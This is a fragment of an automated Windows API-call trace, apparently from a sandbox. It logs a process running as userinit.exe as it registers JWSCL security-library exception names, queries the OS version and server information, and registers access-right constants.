[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a9f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a9f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a9f918*="EJwsclFirewallAddRuleException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a9f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a9f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a9f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a9f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a9f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a9f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a9f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a9f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a9f840*="EJwsclGetFWStateException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a9f828*="EJwsclSetFWStateException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a9f810*="EJwsclFirewallProfileInitException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a9f7f8*="EJwsclFirewallInitException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a9f7e0*="EJwsclGenericFirewallException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a9f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a9f7b0*="EJwsclInvalidRegistryPath") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a9f798*="EJwsclEndOfStream") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a9f780*="EJwsclClassTypeMismatch") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a9f768*="EJwsclInvalidHandle") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a9f750*="EJwsclInvalidIndex") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a9f738*="EJwsclInvalidSession") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a9f720*="EJwsclMissingEvent") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a9f708*="EJwsclInvalidPointerType") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a9f6f0*="EJwsclCreateProcessFailed") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a9f6d8*="EJwsclNilPointer") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a9f6c0*="EJwsclUnimplemented") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a9f6a8*="EJwsclInitWellKnownException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a9f690*="EJwsclKeyApiException") returned 1
[0140.810] SysReAllocStringLen (in: pbstr=0x2a9f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a9f678*="EJwsclKeyException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a9f660*="EJwsclHashApiException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a9f648*="EJwsclHashException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a9f630*="EJwsclCSPApiException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a9f618*="EJwsclCSPException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a9f600*="EJwsclTerminalSessionException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a9f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a9f5d0*="EJwsclTerminalServiceException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a9f5b8*="EJwsclTerminalServerConnectException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a9f5a0*="EJwsclTerminalServerException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a9f588*="EJwsclCryptUnsupportedException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a9f570*="EJwsclCryptApiException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a9f558*="EJwsclCryptException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a9f540*="EJwsclOSError") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a9f528*="EJwsclResourceInitFailed") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a9f510*="EJwsclResourceUnequalCount") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a9f4f8*="EJwsclResourceNotFound") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a9f4e0*="EJwsclResourceException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a9f4c8*="EJwsclFailedAddACE") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a9f4b0*="EJwsclUnsupportedACE") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a9f498*="EJwsclOpenWindowStationException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a9f480*="EJwsclWindowStationException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a9f468*="EJwsclCloseDesktopException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a9f450*="EJwsclCreateDesktopException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a9f438*="EJwsclOpenDesktopException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a9f420*="EJwsclDesktopException") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a9f408*="EJwsclSACLAccessDenied") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a9f3f0*="EJwsclAccessDenied") returned 1
[0140.811] SysReAllocStringLen (in: pbstr=0x2a9f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a9f3d8*="EJwsclLSAException") returned 1
[0140.812] SysReAllocStringLen (in: pbstr=0x2a9f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a9f3c0*="ESetOwnerException") returned 1
[0140.812] SysReAllocStringLen (in: pbstr=0x2a9f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a9f3a8*="ESetSecurityException") returned 1
[0140.812] SysReAllocStringLen (in: pbstr=0x2a9f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a9f390*="EJwsclInvalidParentDescriptor") returned 1
[0140.812] SysReAllocStringLen (in: pbstr=0x2a9f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a9f378*="EJwsclInvalidKeyPath") returned 1
[0140.812] SysReAllocStringLen (in: pbstr=0x2a9f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a9f360*="EJwsclInvalidGenericAccessMask") returned 1
[0140.812] SysReAllocStringLen (in: pbstr=0x2a9f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a9f348*="EJwsclAdaptSecurityInfoException") returned 1
[0140.812] SysReAllocStringLen (in: pbstr=0x2a9f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a9f330*="EJwsclThreadException") returned 1
[0140.812] SysReAllocStringLen (in: pbstr=0x2a9f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a9f318*="EJwsclInvalidObjectException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a9f300*="EJwsclSecurityObjectException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a9f2e8*="EJwsclHashMismatch") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a9f2d0*="EJwsclStreamHashException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a9f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a9f2a0*="EJwsclStreamSizeException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a9f288*="EJwsclStreamException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a9f270*="EJwsclNoSuchLogonSession") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a9f258*="EJwsclInvalidFlagsException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a9f240*="EJwsclProcessNotFound") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a9f228*="EJwsclInvalidParameterException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a9f210*="EJwsclInvalidPathException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a9f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a9f1e0*="EJwsclInvalidRevision") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a9f1c8*="EJwsclInvalidAceMismatch") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a9f1b0*="EJwsclRevisionMismatchException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a9f198*="EJwsclInvalidACEException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a9f180*="EJwsclReadOnlyPropertyException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a9f168*="EJwsclDuplicateListEntryException") returned 1
[0140.813] SysReAllocStringLen (in: pbstr=0x2a9f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a9f150*="EJwsclIndexOutOfBoundsException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a9f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a9f120*="EJwsclInvalidKnownSIDException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a9f108*="EJwsclInvalidComputer") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a9f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a9f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a9f0c0*="EJwsclInvalidSIDException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a9f0a8*="EJwsclInvalidSecurityListException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a9f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a9f078*="EJwsclEmptyACLException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a9f060*="EJwsclNILParameterException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a9f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a9f030*="EJwsclInvalidObjectArrayException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a9f018*="EJwsclProcessIdNotAvailable") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a9f000*="EJwsclWinCallFailedException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a9efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a9efd0*="EJwsclNotImplementedException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a9efb8*="EJwsclAccessTypeException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a9efa0*="EJwsclAdjustPrivilegeException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a9ef88*="EJwsclPrivilegeCheckException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a9ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a9ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a9ef40*="EJwsclPrivilegeException") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a9ef28*="EJwsclNotEnoughMemory") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a9ef10*="EJwsclInvalidTokenHandle") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a9eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0140.814] SysReAllocStringLen (in: pbstr=0x2a9eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a9eee0*="EJwsclDuplicateTokenException") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a9eec8*="EJwsclInvalidOwnerException") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a9eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a9ee98*="EJwsclTokenPrimaryException") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a9ee80*="EJwsclTokenImpersonationException") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a9ee68*="EJwsclTokenInformationException") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a9ee50*="EJwsclSharedTokenException") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a9ee38*="EJwsclOpenProcessTokenException") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a9ee20*="EJwsclOpenThreadTokenException") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a9ee08*="EJwsclSecurityException") returned 1
[0140.831] SysReAllocStringLen (in: pbstr=0x2a9edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a9edf0*="Exception") returned 1
[0140.831] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.831] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0140.831] GetVersionExA (in: lpVersionInformation=0xef2f4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x5d0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x1có\x0e") | out: lpVersionInformation=0xef2f4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0140.831] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0140.831] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0140.837] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0140.837] NetServerGetInfo (in: servername="", level=0x65, bufptr=0xef378 | out: bufptr=0xef378) returned 0x0
[0140.841] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0140.841] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0140.841] NetApiBufferFree (Buffer=0x5f1d00) returned 0x0
[0140.841] SetErrorMode (uMode=0x8000) returned 0x1
[0140.841] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0140.842] SetErrorMode (uMode=0x1) returned 0x8000
[0140.842] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.843] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.844] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.846] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9ec40*="DELETE") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9ec30*="READ_CONTROL") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9ec20*="WRITE_OWNER") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9ec10*="WRITE_DAC") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a9ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a9ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a9ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a9ebd0*="FILE_WRITE_DATA") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a9ebc0*="FILE_READ_DATA") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a9ebb0*="FILE_ALL_ACCESS") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9eb80*="STANDARD_RIGHTS_READ") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9eb70*="STANDARD_RIGHTS_ALL") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9eb50*="DELETE") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9eb40*="READ_CONTROL") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9eb30*="WRITE_OWNER") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9eb20*="WRITE_DAC") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a9eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a9eb00*="TOKEN_ADJUST_DEFAULT") returned 1
